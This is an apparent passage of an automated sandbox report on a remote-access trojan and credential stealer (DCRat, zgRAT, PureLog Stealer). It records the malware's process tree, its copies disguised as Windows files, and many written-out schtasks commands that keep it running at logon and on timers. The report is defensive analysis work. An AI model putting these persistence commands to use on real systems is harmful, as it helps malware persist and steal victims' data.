                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:17:47:34
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
Start time: 17:47:34
Start date: 28/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:47:34
Start date: 28/12/2024
Path: C:\ComproviderComponentIntocommon\Portsessionsvc.exe
Wow64 process (32bit): false
Commandline: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe"
Imagebase: 0x760000
File size: 1'688'064 bytes
MD5 hash: 5231D0FCCC4F24F5B3D76964B3513636
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 78%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 8
Start time: 17:47:37
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 17:47:37
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 17:47:37
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 17:47:37
Start date: 28/12/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
Imagebase: 0x7ff605270000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 17:47:37
Start date: 28/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 17:47:37
Start date: 28/12/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"
Imagebase: 0x7ff7ca7c0000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dwm.exe'" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 13 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "Portsessionsvc" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 17:47:38
Start date: 28/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 17:47:39
Start date: 28/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat"
Imagebase: 0x7ff6b3500000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 17:47:39
Start date: 28/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 17:47:39
Start date: 28/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff707f00000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 17:47:39
Start date: 28/12/2024
Path: C:\Windows\System32\PING.EXE
Wow64 process (32bit): false
Commandline: ping -n 10 localhost
Imagebase: 0x7ff781210000
File size: 22'528 bytes
MD5 hash: 2F46799D79D22AC72C241EC0322B011D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 17:47:39
Start date: 28/12/2024
Path: C:\ComproviderComponentIntocommon\ctfmon.exe
Wow64 process (32bit): false
Commandline: C:\ComproviderComponentIntocommon\ctfmon.exe
Imagebase: 0x810000
File size: 1'688'064 bytes
MD5 hash: 5231D0FCCC4F24F5B3D76964B3513636
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:34
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            Imagebase:0xb00000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:35
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\dwm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\dwm.exe
                                                            Imagebase:0x7ff72bec0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\dwm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\dwm.exe
                                                            Imagebase:0x5e0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Imagebase:0x110000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Imagebase:0xe30000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Imagebase:0x110000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:40
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Imagebase:0x210000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:41
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Imagebase:0xda0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:42
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Imagebase:0x9d0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:17:47:48
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Resources\Themes\smartscreen.exe"
                                                            Imagebase:0x690000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:17:47:49
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                                            Imagebase:0x2e0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:17:47:50
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                                            Imagebase:0x7ff6b3500000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:46
                                                            Start time:17:47:50
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:47
                                                            Start time:17:47:50
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff707f00000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:9.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:9.4%
                                                              Total number of Nodes:1472
                                                              Total number of Limit Nodes:43
23735->23740 23976 43a64d GetCurrentDirectoryW 23736->23976 23737->23736 23743 43b980 GetDlgItem 23738->23743 23744 43b974 23738->23744 23745 42e617 53 API calls 23739->23745 23746 43b85b 23740->23746 23742->23726 23748 43b9b7 SetFocus 23743->23748 23749 43b994 SendMessageW SendMessageW 23743->23749 23744->23734 23757 43be55 23744->23757 23750 43b8ce SetDlgItemTextW 23745->23750 23998 42124f SHGetMalloc 23746->23998 23747 43bf82 GetDlgItem 23752 43bfa5 SetWindowTextW 23747->23752 23753 43bf9f 23747->23753 23754 43b9c7 23748->23754 23766 43b9e0 23748->23766 23749->23748 23755 43b8d9 23750->23755 23977 43abab GetClassNameW 23752->23977 23753->23752 23756 42e617 53 API calls 23754->23756 23755->23726 23759 43b8e6 GetMessageW 23755->23759 23760 43b9d1 23756->23760 23761 42e617 53 API calls 23757->23761 23759->23726 23763 43b8fd IsDialogMessageW 23759->23763 23999 43d4d4 23760->23999 23767 43be65 SetDlgItemTextW 23761->23767 23763->23755 23769 43b90c TranslateMessage DispatchMessageW 23763->23769 23765 43c1fc SetDlgItemTextW 23765->23726 23772 42e617 53 API calls 23766->23772 23770 43be79 23767->23770 23769->23755 23775 42e617 53 API calls 23770->23775 23774 43ba17 23772->23774 23773 43bff0 23779 43c020 23773->23779 23782 42e617 53 API calls 23773->23782 23780 424092 _swprintf 51 API calls 23774->23780 23807 43be9c _wcslen 23775->23807 23776 43b9d9 23896 42a0b1 23776->23896 23777 43c73f 97 API calls 23777->23773 23787 43c73f 97 API calls 23779->23787 23844 43c0d8 23779->23844 23783 43ba29 23780->23783 23786 43c003 SetDlgItemTextW 23782->23786 23788 43d4d4 16 API calls 23783->23788 23784 43ba73 23902 43ac04 SetCurrentDirectoryW 23784->23902 23785 43ba68 GetLastError 23785->23784 23793 42e617 53 API calls 23786->23793 23795 43c03b 23787->23795 23788->23776 23789 43c18b 23790 43c194 EnableWindow 23789->23790 23791 43c19d 23789->23791 23790->23791 23796 43c1ba 23791->23796 24017 4212d3 GetDlgItem EnableWindow 23791->24017 23792 43beed 23799 42e617 53 API calls 23792->23799 
23797 43c017 SetDlgItemTextW 23793->23797 23805 43c04d 23795->23805 23828 43c072 23795->23828 23802 43c1e1 23796->23802 23813 43c1d9 SendMessageW 23796->23813 23797->23779 23798 43ba87 23803 43ba9e 23798->23803 23804 43ba90 GetLastError 23798->23804 23799->23726 23800 43c0cb 23808 43c73f 97 API calls 23800->23808 23802->23726 23816 42e617 53 API calls 23802->23816 23809 43bb11 23803->23809 23814 43bb20 23803->23814 23815 43baae GetTickCount 23803->23815 23804->23803 24015 439ed5 32 API calls 23805->24015 23806 43c1b0 24018 4212d3 GetDlgItem EnableWindow 23806->24018 23807->23792 23817 42e617 53 API calls 23807->23817 23808->23844 23809->23814 23818 43bd56 23809->23818 23811 43c066 23811->23828 23813->23802 23823 43bcfb 23814->23823 23824 43bcf1 23814->23824 23825 43bb39 GetModuleFileNameW 23814->23825 23820 424092 _swprintf 51 API calls 23815->23820 23821 43b862 23816->23821 23822 43bed0 23817->23822 23918 4212f1 GetDlgItem ShowWindow 23818->23918 23830 43bac7 23820->23830 23821->23726 23821->23765 23831 424092 _swprintf 51 API calls 23822->23831 23827 42e617 53 API calls 23823->23827 23824->23734 23824->23823 24009 42f28c 82 API calls 23825->24009 23826 43c169 24016 439ed5 32 API calls 23826->24016 23835 43bd05 23827->23835 23828->23800 23836 43c73f 97 API calls 23828->23836 23829 43bd66 23919 4212f1 GetDlgItem ShowWindow 23829->23919 23903 42966e 23830->23903 23831->23792 23834 43c188 23834->23789 23841 424092 _swprintf 51 API calls 23835->23841 23842 43c0a0 23836->23842 23838 42e617 53 API calls 23838->23844 23839 43bb5f 23840 424092 _swprintf 51 API calls 23839->23840 23845 43bb81 CreateFileMappingW 23840->23845 23846 43bd23 23841->23846 23842->23800 23847 43c0a9 DialogBoxParamW 23842->23847 23843 43bd70 23848 42e617 53 API calls 23843->23848 23844->23789 23844->23826 23844->23838 23850 43bbe3 GetCommandLineW 23845->23850 23880 43bc60 __InternalCxxFrameHandler 23845->23880 23858 42e617 53 API calls 23846->23858 23847->23734 23847->23800 23851 43bd7a 
SetDlgItemTextW 23848->23851 23853 43bbf4 23850->23853 23920 4212f1 GetDlgItem ShowWindow 23851->23920 23852 43baed 23855 43baff 23852->23855 23856 43baf4 GetLastError 23852->23856 24010 43b425 SHGetMalloc 23853->24010 23911 42959a 23855->23911 23856->23855 23862 43bd3d 23858->23862 23859 43bd8c SetDlgItemTextW GetDlgItem 23863 43bdc1 23859->23863 23864 43bda9 GetWindowLongW SetWindowLongW 23859->23864 23861 43bc10 24011 43b425 SHGetMalloc 23861->24011 23921 43c73f 23863->23921 23864->23863 23867 43bc1c 24012 43b425 SHGetMalloc 23867->24012 23870 43c73f 97 API calls 23872 43bddd 23870->23872 23871 43bc28 24013 42f3fa 82 API calls 2 library calls 23871->24013 23946 43da52 23872->23946 23874 43bccb 23874->23824 23878 43bce1 UnmapViewOfFile CloseHandle 23874->23878 23876 43bc3f MapViewOfFile 23876->23880 23878->23824 23879 43c73f 97 API calls 23884 43be03 23879->23884 23880->23874 23882 43bcb7 Sleep 23880->23882 23881 43be2c 24014 4212d3 GetDlgItem EnableWindow 23881->24014 23882->23874 23882->23880 23884->23881 23885 43c73f 97 API calls 23884->23885 23885->23881 23887 421378 23886->23887 23888 42131f 23886->23888 24020 42e2c1 GetWindowLongW SetWindowLongW 23887->24020 23889 421385 23888->23889 24019 42e2e8 62 API calls 2 library calls 23888->24019 23889->23724 23889->23726 23889->23727 23892 421341 23892->23889 23893 421354 GetDlgItem 23892->23893 23893->23889 23894 421364 23893->23894 23894->23889 23895 42136a SetWindowTextW 23894->23895 23895->23889 23897 42a0bb 23896->23897 23898 42a175 23897->23898 23899 42a14c 23897->23899 24021 42a2b2 23897->24021 23898->23784 23898->23785 23899->23898 23900 42a2b2 8 API calls 23899->23900 23900->23898 23902->23798 23904 429678 23903->23904 23905 4296d5 CreateFileW 23904->23905 23906 